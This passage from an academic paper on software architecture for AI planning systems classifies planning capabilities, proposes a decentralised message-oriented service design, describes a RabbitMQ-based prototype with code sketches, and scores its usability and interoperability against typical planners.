| SIPE-2 Wilkins2000 | ˆP+ | X | X | X | X | X | X | X | | | | X | | | | | | | X |
| SOA-PE Feljan2017 | ˆP+ | X | | X | | | X | X | X | X | | | | | | | | | X |
| SMP System Fratini2013 | ˆP− | X | X | (X) | X | X | X | | | | | | | | X | | | | X |
| UMCP erol1994umcp | P | X | | X | | | | | | | | | | | | | | | |
Table 1: An Overview of Planning Artifacts and Their Corresponding Capabilities. P indicates a planner, ˆP− indicates a planning system with an external planner, and ˆP+ indicates a planning system with a dedicated planner. “X” indicates a support for a planning capability, and “(X)” indicates that a planning capability is not implemented or not available in all versions of the artifact.
###
4.2 Classification
We classify the identified AI planning capabilities from two orthogonal views. The first view classifies the capabilities according to their operational competences, while the second view according to their technical properties.
####
4.2.1 Operational View
Our operational view for classification of AI planning capabilities is inspired by the following classes of capabilities defined in a business context for operational processes: core capabilities, enabling capabilities, and supplemental capabilities leonard1995wellspring; prahalad1990g. Core capabilities are defined as capabilities that provide access to a wide variety of domains, make a significant contribution to the perceived benefits, and are challenging to imitate prahalad1990g. Enabling capabilities are defined as capabilities that do not provide a competitive advantage on their own but are necessary for other capabilities prahalad1990g. Supplemental capabilities are easily accessible and provide a competitive advantage for the user. This class of capabilities often requires Enabling capabilities to run.
By following these definitions, we classify planning capabilities as follows. The minimal set of Core planning capabilities consists of the Modelling, Solving and Executing capabilities. The set of Enabling planning capabilities consists of the Converting, Graph-handling, Managing, Monitoring, Normalising, Relaxing, Searching and Verifying & Validating capabilities. The set of Supplemental planning capabilities consists of the Explaining, Learning, Parsing, Reacting, Storing and Visualising capabilities.
####
4.2.2 Technical View
We now turn the view orthogonally to the technical perspective. It is known that patterns represent a scientific and timeless approach to describing behaviour and the context of behaviour alexander1979timeless. The enterprise integration patterns instantiate such an approach hohpe2004enterprise, and we apply them to the AI planning capabilities to classify the capabilities into appropriate classes.
Before we map AI planning capabilities to patterns, we want to reduce the complexity of the planning process and its relevant aspects. To achieve this, we view the process as a black-box pipeline based on the Pipes and Filters pattern hohpe2004enterprise. The main components of this pattern are filter nodes, source nodes, and sink nodes. Filter nodes are processing units of the pipeline. Source nodes provide input data to the pipeline, while sink nodes collect the outcome from the end of the pipeline. By using these types of nodes and analysing the AI planning capabilities, we observe that each capability can be reduced to one of the node types. The left-hand side of [Table 2](#S4.T2 "Table 2 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") gives an overview of the reduction of the planning capabilities to node types.
| Capability | Source | Filter | Sink | Pattern | Class |
| --- | --- | --- | --- | --- | --- |
| Converting | | X | | Message Translator | Transforming |
| Executing | | | X | Service Activator | Endpoint |
| Explaining | | | X | Message Endpoint | Endpoint |
| Graph-Handling | | X | | Message Translator | Transforming |
| Learning | X | X | | Message Endpoint | Endpoint |
| Managing | | X | | Process Manager | Routing |
| Modelling | X | | | Message Endpoint | Endpoint |
| Monitoring | | X | | Control Bus, Wire Tap | System-Management |
| Normalising | | X | | Normalizer | Transforming |
| Parsing | | X | | Message Translator | Transforming |
| Problem generating | | X | | Content Enricher | Transforming |
| Reacting | | X | | Event-Driven Consumer | Endpoint |
| Relaxing | | X | | Message Translator | Transforming |
| Searching | | X | | Content Filter | Transforming |
| Solving | | X | | Message Translator | Transforming |
| Storing | | | X | Message Store | System-Management |
| Verifying & Validating | X | X | | Content Based Router, Detour | Routing |
| Visualising | X | | X | Polling Consumer, Event-Driven Consumer | Endpoint |
Table 2: Technical Classification of AI Planning Capabilities
With this knowledge, we map the AI planning capabilities to appropriate patterns. The right-hand side of [Table 2](#S4.T2 "Table 2 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") gives an overview of the mapping. The resulting patterns can be grouped into four classes, namely Endpoint, Transforming, System Management and Routing. The Endpoint class includes patterns that enable software components connect to a messaging system for the purpose of sending and receiving messages. The Transforming class encompasses patterns that translate, enrich, normalise or perform any other form of transformation of messages. The System Management class contains patterns that monitor the flow and processing of messages and deal with exceptions and performance bottlenecks of the underlying system. The Routing class includes patterns that enable decoupling a component that sends a message from one that receives the message. As a consequence of this pattern grouping, AI planning capabilities can be also categorised in the four classes, providing the technical view of classification, as shown in [Table 2](#S4.T2 "Table 2 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems").
The connections among the pattern classes and their relationship with the node types is shown in [Figure 1](#S4.F1 "Figure 1 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems"). Endpoints represent either source nodes or sink nodes. Such endpoints can call each other or call filter nodes from the Routing or Transforming class.
System Management also monitors routing and transforming capabilities.

Figure 1: Relationships Between Pattern Classes and Node Types
5 Architecture Design
----------------------
With the collection of planning capabilities and the classifications, we can design a fully operational planning architecture. Next, we determine the requirements of interest and structure of the planning architecture, and then we provide some general and more specific consideration for the architecture design.
###
5.1 Capability Requirements
While current planning artefacts provide powerful means to search for and execute plans, they lack qualities as software systems. Planning artefacts are often functionally overloaded to meet their goals, which increases complexity and reduces the level of usability, the first requirement of our interest.
Since real-world planning problems are too complex to be solved by a solving capability only, the problems are often decomposed into sub-problems that need to be handled by separate planning capabilities, such as modelling, execution and reaction. These capabilities in turn must communicate with each other and with external services, and thus exchange messages. So, the second requirement of interest is interoperability.
Many planning artefacts require the same planning capabilities for full functionality. For instance, numerous planning artefacts require a PDDL parsing capability. Currently, the planning artefacts either implement their own version of a parsing capability or integrate full planners to use the planners’ parsing functionality. So, enabling reusability of planning capabilities is the third requirement we consider in the design of the planning architecture.
####
5.1.1 Usability
Usability starts on the interaction side. Independent of the user’s skills, the user should be able to use the planning capabilities. Thus, a certain level of “ease of use” is mandatory for planning capabilities to be usable. With good usability, it does not matter if a planning capability is a front-end or back-end service; the appropriate usability criteria are the same. According to the ISO 9241-11 standard ISO-9241-11-2018, we need to maximise the effectiveness, efficiency and user satisfaction.
####
5.1.2 Interoperability
Interoperability is largely achieved by using unified models at every endpoint. So, the concepts of loose coupling and messaging are mandatory. According to Delgado2013, four levels of interoperability should be considered in the design: the organisational, semantic, syntactic and connectivity level. On the organisational level, we must ensure that each planning request follows a purpose. This level covers a strategy, the choice of interacting component, and the outsourcing of parts of the functionality to other services. On the semantic level, we have to ensure that both interacting services interpret a message or request in the same way. This means a domain of values, relevant rules, and/or a choreography must be provided to ensure equivalent handling between interacting components. On the syntactic level, we need to focus on the notation (format) of a planning request. The message must follow the structure of defined schemas. In most cases, RESTful Application Programming Interfaces (APIs) or messaging channels use JSON or XML as a message format. On the connectivity level, we need to deal with a protocol as an essential step for transferring a planning request. This level requires the selection of a message protocol and routing to the correct endpoint. Note that, to achieve the best possible interoperability overall, planning capabilities have to aim for the best interoperability on each of the levels.
####
5.1.3 Reusability
To mitigate or reduce the development effort for new AI planning capabilities, the reusability of existing planning concepts and services is indispensable. To allow reuse of planning capabilities, the number of dependencies has to be minimal. This requirement is also related to the loose coupling autonomies (see Section [2.2](#S2.SS2 "2.2 Service-Oriented Architecture ‣ 2 Background ‣ Software Architecture for Next-Generation AI Planning Systems")). To support the reusability of planning capabilities, we consider the following quality characteristics: portability, flexibility, and understandability. For details on these characteristics of reusability, we refer to Cardino1997.
###
5.2 Decentralised Approach
Our choice for the design of the planning architecture falls to a decentralised approach, as it offers the best properties to achieve loose coupling. First, communication between capabilities based on messaging in the publish-subscribe stack is most often characterised by good performance, which is especially useful in systems with a high load and several clients, such as smart energy systems georgievski2017:pmc. Second, decentralised planning systems may scale very well horizontally since each planning capability would have its own incoming and outgoing topic. Furthermore, the automatic configuration detection in MOM helps to add new planning capabilities during a system's runtime. Most importantly, planning capabilities can request other capabilities directly, without a gateway that first checks availability. Finally, since it is essential to increase reliability and not violate the principles of services, the planning capabilities must be designed and implemented to be stateless.
###
5.3 Planning Architecture
We design the planning architecture considering general service requirements (see 1407782). The architecture aims at defining a composition of planning capabilities and thereby facilitating their implementation as services. Our proposal for the design of the planning architecture is based on the Hub-and-Spoke pattern hohpe2004enterprise. Usually, this kind of architecture pattern does not perform well when it comes to scaling. However, since MOM provides the hub, selecting the best-fitting technology for the MOM can help overcome this issue. The use of this design pattern also makes it easy to connect new planning capabilities to each other through the hub.
[Figure 2](#S5.F2 "Figure 2 ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows an abstract overview of the planning architecture. The architecture consists of a front-end service, MOM, and various back-end services. Due to the ease of implementation, we propose communication of the front-end capabilities based on RESTful Web services for synchronous calls and Web Sockets for asynchronous messaging. Using these standard Web communication concepts also enables the simple integration of security features (e.g., HTTPS and JWT on the header).

Figure 2: Abstract Overview of the Planning Architecture
[Figure 3](#S5.F3 "Figure 3 ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows the complete architectural design. It can be observed that the architecture provides great opportunities since the operational and technical classes also specify the context of use. The range of functionality can be extended significantly by implementing different capability service instances for the same capability class. Some capabilities require dedicated interfaces to function properly. For instance, the Executing capability requires interfaces for action invocations. Besides this, the Storing capability requires a database so as not to violate the stateless principle of services. Since front-end capabilities require a bridging service to access the MOM data, a Managing capability is utilised. All other capabilities are connected using messaging on a publish-subscribe basis.

Figure 3: Overview of the Planning Architecture
User interaction is also considered by accounting for appropriate graphical user interfaces through which information can be passed to the system. This information mainly refers to models of domains and problems, or configurations. Additionally, a Visualisation capability is envisioned to display relevant results (e.g., sequential plans) and to provide monitoring figures or statistics. The design does not put any restrictions on the use of third-party API.
####
5.3.1 Messaging
We propose the following template for naming MOM topics:
`<ver>.<capability-class>.<capability-name>#<name>`
The last part of the template (`#<name>`) defines the handling of instances of a capability. Note that a capability instance refers to an implementation instance rather than a service instance for high availability. This value should not be a unique instance ID since horizontal scalability is necessary. In case of multiple instances of the same planning service, a common name should be used to enable parallel execution of tasks. Therefore, the architecture does not define any implementation detail. Only the existence of an additional sub-topic or flag is important.
To avoid blocking, outgoing topics are not provided since this would encourage polling endpoints. It is necessary to specify a response topic in a request message to route the message after its processing dynamically. The underlying pattern is Request-Reply with an extension of the Return Address pattern hohpe2004enterprise.
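The following is a minimal sketch of this messaging scheme, assuming RabbitMQ as the MOM and the Python `pika` client; the topic names follow the template above but are otherwise illustrative, as are the correlation identifier and the payload. The Return Address and the correlation identifier (see Section 5.3.2) travel in the standard AMQP message properties.

```python
import pika

# Publish a parsing request following the topic template
# <ver>.<capability-class>.<capability-name>#<name> (names are illustrative).
connection = pika.BlockingConnection(pika.ConnectionParameters(host="localhost"))
channel = connection.channel()
channel.exchange_declare(exchange="planning", exchange_type="topic")

channel.basic_publish(
    exchange="planning",
    routing_key="v1.transforming.parsing#pddl",
    properties=pika.BasicProperties(
        reply_to="v1.transforming.solving#sequential",  # Return Address pattern
        correlation_id="req-42",  # used later to merge sub-task results
    ),
    body=b"(define (problem p1) ...)",
)
connection.close()
```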
####
5.3.2 Statelessness
If a capability service needs to assign a sub-task of its planning task to another capability, the state of the process must be stored temporarily so that the capability service becomes stateless and nonblocking after the assignment (i.e., sending a message). To maintain the IDEAL properties of the future system (see Fehling2014; Breitenbucher2019), the use of an isolated state is necessary. Therefore, the planning capabilities that call other capabilities to place requests must store the state externally. To merge the results of sub-tasks in the corresponding capability service, a so-called correlation identifier is used to guarantee the correctness of the correlation hohpe2004enterprise.
####
5.3.3 Handling of Requests
We now describe the adopted integration patterns per technical class. These patterns can be applied to all capability services of the respective class.
#### Endpoint planning capabilities
Since Endpoint planning capabilities can occur in different variants, a general pattern is not applicable. Therefore, a distinction between front-end and back-end services is necessary.
##### Back-end capabilities
All planning capabilities within the Endpoint class that do not have to process direct user input can be considered back-end capabilities. [Figure 4](#S5.F4 "Figure 4 ‣ Back-end capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows an example for the processing of a planning request. The following steps are performed (also highlighted in [Figure 4](#S5.F4 "Figure 4 ‣ Back-end capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. The back-end service has an established subscription to its incoming exchange topic and starts processing the message.
2. The request is received and placed in a queue. All requests are processed one after another (i.e., in first-in-first-out order). The results are pushed to the corresponding reply queue.
3. The response is taken from the reply queue and sent to the corresponding topic.

Figure 4: Back-End Endpoint Capability
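A hedged sketch of such a back-end endpoint, again assuming RabbitMQ and `pika`; the exchange, queue name, binding and capability logic are placeholders. The consumer processes requests in first-in-first-out order and routes each reply dynamically via the request's `reply_to` property.

```python
import pika

connection = pika.BlockingConnection(pika.ConnectionParameters(host="localhost"))
channel = connection.channel()
channel.exchange_declare(exchange="planning", exchange_type="topic")
channel.queue_declare(queue="v1.transforming.parsing")
channel.queue_bind(queue="v1.transforming.parsing", exchange="planning",
                   routing_key="v1.transforming.parsing#pddl")

def on_request(ch, method, properties, body):
    result = body.upper()  # placeholder for the actual capability logic
    ch.basic_publish(
        exchange="planning",
        routing_key=properties.reply_to,  # dynamic routing to the reply topic
        properties=pika.BasicProperties(correlation_id=properties.correlation_id),
        body=result,
    )
    ch.basic_ack(delivery_tag=method.delivery_tag)

channel.basic_consume(queue="v1.transforming.parsing",
                      on_message_callback=on_request)
channel.start_consuming()  # requests are consumed in first-in-first-out order
```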
##### Front-End capabilities
All planning capabilities within the Endpoint class that have to process direct user input can be considered front-end capabilities. [Figure 5](#S5.F5 "Figure 5 ‣ Front-End capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows an example for the processing of a user request. The following steps are performed (also highlighted in [Figure 5](#S5.F5 "Figure 5 ‣ Front-End capabilities ‣ Endpoint planning capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. The front-end capability service receives new information from user input. All information is placed at the request body of a RESTful POST message.
2. The front-end capability service calls the RESTful endpoint of a routing capability.
3. The Routing capability service processes the request and sends it to a Solving capability using MOM.
4. After the system has processed the request, the response or error is passed back to the routing capability. A Web Socket is used to send the asynchronous response back to the front-end.
5. The front-end receives the response or a custom error and processes it (e.g., visualises it).

Figure 5: Front-End Endpoint Capability
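A compressed sketch of this front-end path in Python, with FastAPI as a stand-in for the RESTful and Web Socket endpoints; the framework choice and the `forward_to_routing` call are assumptions for illustration.

```python
from fastapi import FastAPI, WebSocket

app = FastAPI()
sockets: dict[str, WebSocket] = {}  # open Web Sockets keyed by correlation id

def forward_to_routing(request: dict) -> None:
    pass  # placeholder: publish the request to the Routing capability via MOM

@app.post("/plan")  # steps 1-2: user input arrives in the POST body
async def submit(request: dict) -> dict:
    forward_to_routing(request)
    return {"status": "accepted", "id": request["id"]}

@app.websocket("/results/{correlation_id}")  # steps 4-5: async response path
async def results(ws: WebSocket, correlation_id: str) -> None:
    await ws.accept()
    sockets[correlation_id] = ws  # the MOM callback later pushes results here
```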
#### Transforming capabilities
Since all planning capabilities in the Transforming class are identical from an architectural point of view, one pattern can be applied to all of them. [Figure 6](#S5.F6 "Figure 6 ‣ Transforming capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows a processing of a simple request by a transforming capability. The following steps are performed (also highlighted in [Figure 6](#S5.F6 "Figure 6 ‣ Transforming capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. Service A creates a new request and pushes the message to the corresponding transforming topic in MOM.
2. The transforming service has an established subscription to its incoming topic, and the message is pushed to the queue of the transforming capability.
3. The transforming service processes the request and sends it to the given response topic.
4. The response is placed on service A’s capability topic in MOM.
5. Service A has an established subscription to its incoming topic and starts processing the message.

Figure 6: Transforming Capability
Since the architecture allows dynamic routing, the transforming capability is free to decide if any other transformation is necessary to reach the requested response format.
#### System Management Capabilities
System management and monitoring capabilities differ slightly at the architecture level; only the origin of the information within MOM varies. The typical behaviour of a system management capability includes one step in which the service establishes a subscription to at least one topic and another step in which it processes a message.
#### Routing capabilities
Since only one capability has been classified as a routing capability so far, a single architecture pattern can be applied. The basic functionality is similar to that of the front-end endpoint capability. Here we focus on the global error handling that is done by the Routing capability. [Figure 7](#S5.F7 "Figure 7 ‣ Routing capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows the architecture pattern and behaviour of the Routing capability. The following steps are performed (also highlighted in [Figure 7](#S5.F7 "Figure 7 ‣ Routing capabilities ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems")):
1. Service A throws a custom error on processing a request. The request is handled and sent to the routing capability topic.
2. The routing service consumes the message from the topic and pushes it to the correct queue.
3. Normally the request is pushed to the in-queue (step 3.1). In this example, the message is an error, so the error-queue is responsible (step 3.2). The response or error is processed depending on the specific implementation.

Figure 7: Routing Capability
6 Implementation
-----------------
As a proof of concept, we implemented a prototype planning system whose deployment diagram is shown in [Figure 8](#S6.F8 "Figure 8 ‣ 6 Implementation ‣ Software Architecture for Next-Generation AI Planning Systems"). It consists of five planning services that provide a fully functioning planning system. Besides the general division into front-end and back-end services, the technologies used for the realisation of each service are also shown. We implemented the modelling capability using Angular (<https://angular.io>) and TypeScript (<https://www.typescriptlang.org>). For the back-end capabilities, we used Spring Boot (<https://spring.io/projects/spring-boot>) and Kotlin (<https://kotlinlang.org>). As message-oriented middleware, we use RabbitMQ (<https://www.rabbitmq.com>).

Figure 8: Deployment Diagram of the Prototype Planning System
We used reactive programming, among other things, to handle asynchronous processes in a non-blocking manner. Special attention is paid to dynamic routing to avoid the classical ping-pong process and to increase reusability. We configured RabbitMQ to give each planning service its own message queue for incoming tasks. As RabbitMQ provides built-in filtering of messages in a topic (via so-called routing keys), we use this feature so as not to compromise the extensibility of the same capability classes (e.g., the HDDL parsing capability). Each queue can be configured to accept from the topic only the tasks with the appropriate routing key. This enables the creation of new planning services and their integration into the running system. Each service is able to create related topics and register new queues in the messaging system.
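As an illustration, the following sketch (Kotlin with Spring AMQP; queue, exchange and routing-key names are ours, not the prototype's) declares a capability queue bound to a topic exchange with a routing key:

```kotlin
import org.springframework.amqp.core.Binding
import org.springframework.amqp.core.BindingBuilder
import org.springframework.amqp.core.Queue
import org.springframework.amqp.core.TopicExchange
import org.springframework.context.annotation.Bean
import org.springframework.context.annotation.Configuration

@Configuration
class HddlParsingQueueConfig {

    @Bean
    fun planningExchange() = TopicExchange("planning.exchange")

    @Bean
    fun hddlParsingQueue() = Queue("parsing.hddl.in")

    // Only tasks published with the routing key "parsing.hddl" reach this queue,
    // so another parsing service (e.g., for PDDL) can bind its own queue to the
    // same exchange without interference.
    @Bean
    fun hddlBinding(hddlParsingQueue: Queue, planningExchange: TopicExchange): Binding =
        BindingBuilder.bind(hddlParsingQueue).to(planningExchange).with("parsing.hddl")
}
```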
Each planning service can be delivered as a Docker (<https://www.docker.com>) image with a single command. The entire planning system can be deployed using Docker-Compose. By utilising runtime environment parameters, a predefined profile can be selected to allow the deployment of the system to different stages.
To use a minimal amount of process-relevant information in services, we use the Routing Slip pattern. This pattern allows dynamic routing of messages across multiple services. Implementing the process within a capability would cause reusability to suffer. The pattern is implemented using a call stack. After initially receiving a system request, the system's expected endpoint (topic name and expected type) is pushed first, followed by the initial service, identified by topic name and schema (or only a schema ID if a type registry exists). Typically, the Solving service is the initial capability. In it, a process is pushed onto the stack in the form of sequential steps. Later, the invoked capabilities can extend the process arbitrarily by adding more process steps to the stack. Each capability removes its entry from the stack and sends the result to the next entry above it in the stack.
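A minimal sketch of such a call stack (our illustration; the entry fields are assumptions, not the prototype's actual schema):

```kotlin
import java.util.ArrayDeque

data class SlipEntry(val topic: String, val schemaId: String)

class RoutingSlip {
    // Top of the stack is the next step; the bottom is the system's endpoint.
    private val stack = ArrayDeque<SlipEntry>()

    fun push(entry: SlipEntry) = stack.push(entry)

    // A capability removes its own entry and forwards its result to the entry
    // that is now on top (the next step of the process), or stops when empty.
    fun nextDestination(): SlipEntry? {
        stack.pop()
        return stack.peek()
    }
}
```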
In the following, we provide insights into the implementation of each prototype capability.
### 6.1 Managing Capability
We use the Managing capability to integrate the front-end and back-end. The capability is responsible for handling user requests and delivering results to users. The Managing service also implements basic error handling that uses the correlation identifier of each request. Due to the decentralisation of the message flow, we set up an error queue that transmits the corresponding status to the user when a certain planning capability step fails. Finally, the Managing capability stores the interfaces of the available capabilities, which can be useful to other planning capabilities (see the Solving capability). Currently, only an in-memory solution is integrated, which cannot be used by other capabilities. Note that a list of all available capabilities is already realised in the prototype by using the RabbitMQ API.
For communication with the Modelling capability, the Managing capability provides a RESTful interface. For the connection to RabbitMQ, a corresponding exchange topic is created. To efficiently handle asynchronous system responses (i.e., results and errors), the Managing capability implements a Web Socket. Non-blocking asynchronous event streams are processed using Reactor (<https://spring.io/reactive>).
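As an illustration of such a non-blocking result stream (the sink-based design below is an assumption for the sketch, not the prototype's actual code):

```kotlin
import reactor.core.publisher.Flux
import reactor.core.publisher.Sinks

class ResultPublisher {
    // Results arriving asynchronously from RabbitMQ are emitted into a multicast sink ...
    private val sink: Sinks.Many<String> =
        Sinks.many().multicast().onBackpressureBuffer()

    fun onResult(planJson: String) {
        sink.tryEmitNext(planJson)
    }

    // ... and the Web-Socket handler subscribes to the resulting non-blocking stream.
    fun results(): Flux<String> = sink.asFlux()
}
```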
### 6.2 Parsing Capability
The Parsing capability converts planning problems specified in some syntax into programming-level objects. This service requires the implementation of a `ParsingRequest` interface, which includes syntactic models of a planning domain and problem instance. To reduce the size of messages, the input should be given as `base64` strings. The input is interpreted according to the information stored in the call stack. To manage multiple syntactic forms of input to this service (e.g., PDDL, HDDL, SHOP), we use the Strategy pattern, which allows a set of interchangeable algorithms to be encapsulated individually lavieri2019:java-patterns. The basic approach towards the implementation of this service consists of converting internal data models into wrapped data models, which are in turn serialised and provided as JSON messages. The conversion is accomplished by the Converting capability.
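A minimal sketch of the Strategy pattern in this setting (all interface and class names are illustrative):

```kotlin
// Stand-in for the real internal problem model.
data class ParsedProblem(val actions: List<String>)

interface ParsingStrategy {
    fun parse(domain: String, problem: String): ParsedProblem
}

class PddlStrategy : ParsingStrategy {
    override fun parse(domain: String, problem: String) =
        ParsedProblem(actions = listOf("...")) // would delegate to a PDDL parser here
}

class HddlStrategy : ParsingStrategy {
    override fun parse(domain: String, problem: String) =
        ParsedProblem(actions = listOf("...")) // would delegate to an HDDL parser here
}

class ParsingService(private val strategies: Map<String, ParsingStrategy>) {
    // The language tag selects the strategy, so new syntaxes can be added
    // without touching the service itself.
    fun handle(language: String, domain: String, problem: String): ParsedProblem =
        strategies.getValue(language).parse(domain, problem)
}
```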
The service implementation parses PDDL planning problems. This is accomplished using the PDDL4J library Pellier2018. For other alternatives, see Section [8](#S8 "8 Discussion ‣ Software Architecture for Next-Generation AI Planning Systems").
### 6.3 Converting Capability
We use the Converting capability to demonstrate dynamic routing and the independent insertion of intermediate steps, such as the encoding of planning problems. The encoding step transforms a given planning problem into its final form. Such a transformation is typical for most PDDL-based planners Pellier2018.
The Converting service requires the implementation of the `EncodingRequest` interface. Since our prototype fully supports planning problems specified in PDDL, we implemented the encoding of PDDL to a finite domain representation using the PDDL4J library. We created a `PddlEncodedProblem` class that follows the object structure of the library. We wrap the whole data structure in custom classes to avoid serialisation problems. This implementation choice preserves the representation of a given planning problem as a causal domain transition graph, which provides an efficient way to determine which propositions are accessible from the current state Pellier2018.
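A minimal sketch of such wrapping (plain data classes that a JSON mapper can serialise directly; the field names are illustrative and do not mirror PDDL4J's actual object structure):

```kotlin
// Serialisable wrapper types decouple the message format from library internals.
data class WrappedFact(val name: String, val args: List<String>)

data class PddlEncodedProblemDto(
    val facts: List<WrappedFact>,
    val goals: List<WrappedFact>,
    // Adjacency representation of the causal domain transition graph.
    val transitionGraph: Map<String, List<String>>
)
```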
### 6.4 Solving Capability
The Solving capability requires the implementation of a `SolvingRequest` interface with four arguments: the chosen planner, the chosen planning language, the domain, and the problem instance. A user can select a planner and a planning language. The service subsequently decides on its own authority which planning capabilities are to be used. That is, the `solveProblem()` method is called, which sends a request to the Parsing capability. This connection is currently preconfigured, but the ultimate objective is to search a repository for required interfaces and select an appropriate service interface. The cornerstone for this is already implemented in the Managing capability.
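A minimal sketch of this interface (the exact property names are assumptions):

```kotlin
interface SolvingRequest {
    val planner: String   // identifier of the selected planner
    val language: String  // e.g. "PDDL" or "HDDL"
    val domain: String    // base64-encoded domain description
    val problem: String   // base64-encoded problem instance
}
```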
After receiving a reply from the Converting capability, the solving of the given planning problem begins. Since the data model may not contain a planner field for the response, the call-stack state is used at this point. Depending on the embedded planner, different types of plans can be produced (e.g., sequential plans or partially ordered plans). All results are forwarded according to the call stack.
In our case, the user can select planners with different search strategies and heuristics as implemented in the PDDL4J library. For other alternatives, see Section [8](#S8 "8 Discussion ‣ Software Architecture for Next-Generation AI Planning Systems").
### 6.5 Modelling Capability
The Modelling capability provides a Web interface that enables a user to model planning problems, select a planner, send a solving request, and inspect a found plan. It also provides login, monitoring and administration functionality, such as an overview of the system and the states of capabilities. In case of errors, the Modelling capability provides the stack trace and a reference to the corresponding service. The modelling of planning problems is enabled by a Web IDE implemented using ACE (<https://ace.c9.io/>) with syntax highlighting and folding provided by the WEB planner magnaguagno2017:webplanner.
7 Qualitative Assessment
-------------------------
We now provide a qualitative assessment of our approach. We analyse the usability, interoperability, and reusability of the planning architecture/prototype in comparison with a typical AI planning artefact. To visualise the comparisons of the quality data, we use radar charts. Each quality attribute is divided into several indicators each of which gets a score assigned. The score describes the general suitability of the architecture/artefact with respect to the indicator. We use {−,O,+} as a score range, where each score is correlated with a value as follows: “−”≡0.0; “O”≡0.5; and “+”≡1.0.
### 7.1 Usability
Since we are not primarily interested in user interfaces, we focus on usability from a developer’s point of view. We assess usability considering three indicators: effectiveness, efficiency and user satisfaction. [Figure 9](#S7.F9 "Figure 9 ‣ 7.1 Usability ‣ 7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") shows the scores of these usability indicators. It can be observed that our approach scores equally well or better than a typical planning artefact. We discuss each usability indicator next.

Figure 9: Radar Chart of Usability Indicators
##### Effectiveness
We see effectiveness as a composition of task effectiveness, task completion and error frequency Abran2010. Since we only require existing planning artefacts to be distributed over corresponding planning capabilities, the operation and behaviour of such artefacts would not be affected. As a consequence, the task effectiveness and task completion of integrated planning artefacts are not compromised. If our planning services are distributed over a network, the probability of a high error frequency may grow due to service unavailability. This would not be the case with typical planning artefacts. However, our planning architecture and prototype support resilience by allowing multiple service instances to run and using a messaging system. We can conclude that the general effectiveness of our approach is as high as that of a typical planning artefact without network dependencies. Thus, both score “+”.
##### Efficiency
We use two indicators for efficiency. The first one is related to the first startup of a system. Since most planning artefacts have a large number of dependencies, the first startup is typically time-consuming. On the other hand, our approach is a platform solution that only requires a Web browser, available on any standard computing device.
The second indicator is related to system runtime from the moment of submission of a planning request. Under the assumption of identical computing power, our approach might be slower than a typical planning artefact due to serialisation and messaging, which may require additional computing power. We should also consider that our architecture design offers the possibility of parallelisation. As a consequence, our approach and a typical planning artefact both score “+”.
##### User Satisfaction
We can assume that a high degree of user satisfaction can be achieved by providing front-end capabilities.
However, due to the ability to extend capabilities, our architecture offers a significant advantage over a typical planning artefact. So, the probability of being able to deliver a desired function is correspondingly higher than with a typical planner. Since most existing planners only provide or require a command-line interface, the required knowledge and user involvement is high, and errors due to wrong interaction can occur more easily. Therefore, our approach scores “+”, while a typical planning artefact scores “O” for user satisfaction.
### 7.2 Interoperability
We assess interoperability using its four levels as indicators: organisational, semantic, syntactic and connectivity level. [Figure 10](#S7.F10 "Figure 10 ‣ 7.2 Interoperability ‣ 7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") shows the scores of the interoperability indicators. We can observe that our approach has better scores than a typical planning artefact. We discuss each indicator next.

Figure 10: Radar Chart of the Interoperability Indicators
##### Organisational
Our approach achieves organisational interoperability guaranteed by the architectural design and the clarity of purpose of each capability. On the other hand, planning artefacts are typically not associated with architecture designs, and the purpose of a certain artefact and its components must be deduced either from a relevant paper or from the code, if available. As a consequence, our approach scores “+”, and a typical planning artefact scores “O”.
##### Semantic
Due to the distribution of capabilities in our service-oriented architecture, API documentation is necessary, which we accordingly provide. Our approach gives processing guarantees by specifying the expected return type, but no mandatory validation is performed. Thus, it is theoretically possible to misinterpret objects if they are misused. This risk can be further reduced if service interfaces are sufficiently documented. Therefore, we assign the “O” score to our approach. In a typical planning artefact, semantics are only provided in a corresponding scientific paper, while software documentation is rarely given, if at all. As a consequence, the score for a typical planning artefact is “−”.
##### Syntactic
Since syntactic interoperability requires an SOA, this indicator is not applicable to a typical planning artefact. So, the score is “−”. On the other hand, our approach is based on SOA and uses a uniform communication format (i.e., JSON). Thus, the score is “+”.
##### Connectivity
Connectivity requires decentralisation, a property uncharacteristic of typical planning artefacts. We therefore assign the “−” score. On the other hand, our approach is decentralised and supported by commonly used standards and tools. For the front-end, a RESTful interface is used, which is based on the HTTP protocol. The choice of MOM is RabbitMQ, which is based on the TCP protocol. Both protocols are supported in most programming languages. Finally, our approach does not restrict the choice of MOM. Thus, we award the “+” score.
### 7.3 Reusability
